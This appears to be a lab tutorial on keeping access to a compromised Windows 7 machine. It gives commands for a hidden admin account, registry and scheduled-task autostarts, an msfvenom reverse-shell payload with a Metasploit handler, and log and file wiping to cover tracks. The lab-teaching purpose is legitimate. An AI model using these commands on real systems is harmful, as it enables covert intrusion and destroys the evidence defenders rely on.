Maintaining Access in Privilege Escalation

Privilege Escalation allows an attacker to gain SYSTEM (Windows) or root (Linux) access. But a one-time shell isn’t enough, if the system reboots, the session drops, or defenders remove you out, you lose control. Maintaining Access ensures persistence so we don’t need to exploit again. Maintaining Access ensures you can:

• Re-enter the system without repeating exploitation.
• Stay hidden while persisting in the background.
• Cover your tracks to avoid detection.

In this lab, we’ll use Metasploit, Meterpreter, and manual techniques to add persistence and cover our tracks.

Learning Outcome

• Adding users & backdoors for persistence.
• Using Metasploit persistence module.
• Proving re-entry after reboot (maintaining access).
• Covering tracks to remain hidden.

Adding Users for Persistence

Create a hidden admin account to log back in.

net user backdoor Pass@123 /add
net localgroup administrators backdoor /add

You can verify it with:

net user backdoor

Registry Keys for Persistence

This will launch payload automatically on startup

• To make a registry key that will automatically run backdoor.exe on startup enter this in the shell:

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v updater /t REG_SZ /d "C:\backdoor.exe"

After reboot, backdoor.exe will auto-run

Persistence using msfvenom

• First make the payload in Kali using :

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.102 LPORT=4444 -f exe > backdoor.exe

• Upload this file using meterpreter (don't forget to create the session when exiting using ctrl+Z):

upload backdoor.exe C:\\backdoor.exe

• make a scheduled task on windows shell

schtasks /create /tn "Updater" /tr "C:\backdoor.exe" /sc onlogon /ru SYSTEM

Reverse Shell Persistence using Metasploit

This will help you create a reverse shell session every time the computer gets rebooted. In the meterpreter use this module:

use exploit/windows/local/persistence
set SESSION 1
set LHOST 192.168.56.102
set LPORT 4444
set STARTUP SYSTEM
set PAYLOAD windows/meterpreter/reverse_tcp
exploit # Before exploiting start the listener on another terminal

• Set up a handler on another kali terminal

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.56.102
set LPORT 4444
run

• Reboot windows 7
• After reboot, the victim should automatically reconnect to your handler, giving you a new Meterpreter session.

Covering Tracks

Once persistence is achieved, the attacker’s next step is to hide their presence. Covering tracks is crucial because defenders often investigate event logs, user history, and suspicious files to detect compromise

• Clear Event Logs: Attackers often remove these to prevent defenders from tracing activities.

wevtutil cl Security
wevtutil cl Application
wevtutil cl System

• Or from Meterpreter clear the environment

clearev # This clears all event logs directly from a Meterpreter session.

• Clear user history: Windows stores cached and recently executed files which can reveal attacker activity.

del C:\Windows\Prefetch\*.* # Delete Prefetch Files

Other useful deletions

del %temp%\*.* /s /q :: Clear temporary files 
del C:\Users\<User>\Recent\*.* /q :: Clear recently opened files